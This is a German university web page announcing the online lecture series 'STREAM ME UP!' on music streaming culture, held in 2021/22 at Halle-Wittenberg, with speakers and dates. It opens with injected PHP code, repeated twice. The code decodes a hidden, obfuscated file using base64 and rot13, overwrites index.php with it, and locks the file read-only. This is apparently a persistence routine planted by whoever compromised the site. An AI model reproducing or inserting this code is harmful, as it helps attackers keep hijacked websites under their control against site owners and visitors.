$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Vortragsreihe | Kolloquium »Experimentelle Klangforschung« STREAM ME UP! – Auditive Medienkulturen

Vortragsreihe | Kolloquium »Experimentelle Klangforschung« STREAM ME UP!

Im großen Strom von Digitalisierung und Vernetzung steht das Streaming audiovisueller Produkte emblematisch für Gegensätze: Hyperindividualisierung und Plattformisierung, Empowerment und Algorithmisierung künstlerischer Produktion und musikalischer Rezeption. Dabei ist die Kultur des Streamings zutiefst geprägt durch technische und ökonomische Abläufe, welche nicht nur die sozial verankerten Nutzungsweisen, sondern auch eine spezifische Ästhetik auditiver Kultur unter digitalen Vorzeichen prägt.

Unter dem Titel STREAM ME UP! lädt das Kolloquium» Experimentelle Klangforschung« am Lehrstuhl Musik und Medien der Martin-Luther-Universität Halle-Wittenberg Akteure unterschiedlicher Provenienz ein, welche die Medienkultur des Streamings institutionell mitgestalten, wissenschaftlich aufarbeiten, journalistisch bewerten und ästhetisch verhandeln.

Wintersemester 2021/2022; Dienstags, 18:00 Uhr

Die Online-Vorträge des Kolloquiums sind öffentlich. Link für alle Sitzungen: https://us06web.zoom.us/j/82692598239

09.11.2021
Patrick Vonderau, Wissenschaftler
»Inside/Outside the Box of Streaming (Music)«


23.11.2021
Hainbach, Künstler
»Alles wird gestreamt! Streamen und darüber reden«


07.12.2021
Max Alt, Wissenschaftler
»Was weiß Adorno über Musikstreaming? Ein musik- und medienhistorischer Blick in die Gegenwart«


11.01.2022
Ina Plodroch, Journalistin
»Die Kultur des Popmusikhörens im Wandel—Musikjournalistische Zugänge in Streamingzeiten«


25.01.2022
Udo Noll, Künstler
»radio.earth—Ein kritischer Hörraum für Live-Soundscapes. Von der 1. bis zur 3. Natur«


08.02.2022
Maximilian Haberer, Wissenschaftler
»Gegen den Strom. Subversionspraktiken des Streamingsubjekts«

Das Kolloquium wird organisiert vom Team »Musik und Medien« an der Martin-Luther-Universität Halle-Wittenberg: Prof. Dr. Golo Föllmer, Dr. Anna Schürmer, Alan van Keeken und Christoph Borbach.

Weitere Infos und Anfragen: alan.van-keeken@musikwiss.uni-halle.de

das Programm als PDF zum Download